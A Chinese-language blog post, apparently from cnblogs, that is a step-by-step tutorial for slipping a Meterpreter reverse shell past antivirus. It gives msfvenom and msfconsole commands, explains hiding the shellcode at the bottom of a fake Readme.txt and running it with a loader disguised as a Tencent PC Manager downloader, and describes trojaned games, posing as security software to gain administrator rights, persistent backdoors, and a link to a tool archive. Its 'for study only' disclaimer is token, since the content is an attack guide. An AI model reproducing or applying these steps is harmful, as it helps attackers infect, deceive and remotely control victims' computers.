shellcode超級免殺

shellcode超級免殺

做者聲明: 本文章屬於做者原創,不能轉載,違反網絡安全法本身承擔.這裏只供學習使用.
日期: 2019-12-31
實驗視頻連接: https://www.youtube.com/watch?v=TVN3AOsgvA8&list=PLHxmmOLhBykSVS5buN9VZbhjMR-8K0e34&index=3&t=739s

我試過了電腦管家,火絨安全,McAfee,360, 但只有360使用手動雲查殺時木馬才能查出來 (目前全部軟件都沒法查殺!!!!! 2020-1-2) 從2019-12-29日早上起,我向個人PE-tools工具裏寫了一個功能,就是shellcode注入功能,寫好以後,發現雖然shellcode能注入,可是不能免殺,因而採用各類加密技巧,仍是沒能逃脫火絨,我絞盡腦汁的想,使用dll注入,dll注入雖然能逃脫免殺,payload反彈時,但是不能交互了.我就採用一種更笨的方法,就是程序運行時加載一下shellcode文件,試了一下成功免殺.好廢話很少說,我們開始!!!!shell

效果圖

enter image description here

演示:

環境

Kali (攻擊機)
Win10 (受害機 且安裝有各類殺毒軟件)
WinXp (輔助機,只是用來編譯源碼的)

如何免殺

免殺效果其實很簡單,就是程序啓動後加載文件動態運行裏面寫好的shellcode便可.
並且還方便替換shellcode不用編譯,直接替換文本文件內容便可,且還能夠假裝爲Readme.txt文件
能夠向Readme.txt亂填入一些聲明,將shellcode進行排版,以防被發現..
能夠藉助一些軟件進行編譯你的加載器,修改圖標即大小,讓對方毫無懷疑...

生成shellcode:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c
lhost後面就是我本地的ip, lport後面時指定的一個端口號.指定好以後,會生成shellcode以下圖:

enter image description here

將生成的shellcode複製粘貼到一個文件裏,你也能夠直接使用
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c > a.txt
那shellcode放在了a.txt文件中了,代開看也更上圖如出一轍.

寫入shellcode:

獲得shellcode以後,我先進行操做,涉及到加載器的源碼,我會把它放在末尾來講:
使用我已經編譯後的一個仿真電腦管家下載器,如圖:

enter image description here

一個文件是模擬電腦管家下載器的一個軟件,是我編譯好的一個文件,後面我會講它的簡單原理與製做
另外一個 Readme.txt就是咱們放置shellcode的文件
我向Readme.txt裏寫入了一些東西,可讓下載的人這東西只是用來聲明的,如圖

enter image description here

使勁回車,而後將本身的shellcode複製到該文件.

enter image description here

這裏我把shellcode藏在了該文件的底部,通常人它也只讀前面,後面不會看,看到了也不知道那是啥玩意..
複製好以後,千方百計將這兩個文件仍到你的目標,有不少方法,就很少說了..

實施攻擊:

假如對方已經拿到了,該軟件,如圖:

enter image description here

從這裏能夠知道,靜態的反殺已經OK,昨天使用的各類加密手段,仍是沒能逃脫火絨的魔抓,這個方法還能夠,看一下Readme.txt

enter image description here

往下拉看一下shellcode:

enter image description here

若是以爲shellcode太顯眼,你能夠對它進行base64加解密就行.

在kali中輸入 msfconsole
進入以後如圖:

enter image description here

依次輸入如下命令
#msf5> use exploit/multi/handler
#msf5> set payload windows/meterpreter/reverse_tcp
#msf5> set lhost ip   (這裏填你的攻擊機上的ip) 
#msf5> set lport port (這裏填生成shellcode時的端口)
#msf5> exploit -j    (後臺監聽)

如圖:

enter image description here

當對方點擊QQPCDownload運行時便可獲得shell.

enter image description here

看到了一個session 開啓了輸入 session -i 1 (1就是開啓號) 進行交互.輸入sysinfo

enter image description here

我們使用火絨來邊掃描邊控制吧...

enter image description here

能夠看到,徹底殺不到.....好了演示結束,接下來就是講講加載器咋寫吧.

加載器咋寫:

根據網絡安全法律,不公佈

假裝

可使用,extraicohs工具提取任意一個exe文件的圖標,提取以後,在vc6中添加圖標進行編譯
而後再使用我開發的一個工具調整一下加載器的大小.

enter image description here 我作了幾個遊戲,遊戲裏就包含了木馬,然對方直接不知道這個有病毒.還有一種方式更加假裝. 分享啥啥源碼,好比我作的一個貪吃蛇遊戲,若對方獲得源碼,只要對方編譯運行,便可中招.. 爲了安全着想,我不分享我作的木馬....,但原理我已經說了,十分簡單.. 能夠提取如圖:windows

enter image description here

使用Pe_tools增長大小, 如圖:

enter image description here

寫入到c盤,若爲win10電腦,寫入到其餘磁盤.

enter image description here

實現能夠控制任意一臺中木馬的電腦.

買一個服務器,選擇debian,而後安裝metasploit框架,既能夠實現控制任意一臺中木馬的電腦....

如何獲取管理員權限

侵入對方後,看一下他的安全軟件,而後使用木馬冒充安全軟件,在開發木馬時,設置一下運行的權限爲管理員便可
    而後運行該木馬,這時就會出現一個管理員權限的請求,通常狀況下,用戶都很信任安全軟件獲取管理員權限,則點擊是.
    而後c盤隨你玩了

如何設置後門

要想實現長期控制,就得給對方上傳開機自的木馬...,我已經作好了,且根據對方的殺毒軟件作的一個白加黑.
    殺毒軟件和使用者毫無察覺,爲了避免讓本身進局子,我不會發給別人..

源碼下載 + 測試文件:

實驗工具下載: https://files-cdn.cnblogs.com/files/lyxf/exploit.zip
相關文章
相關標籤/搜索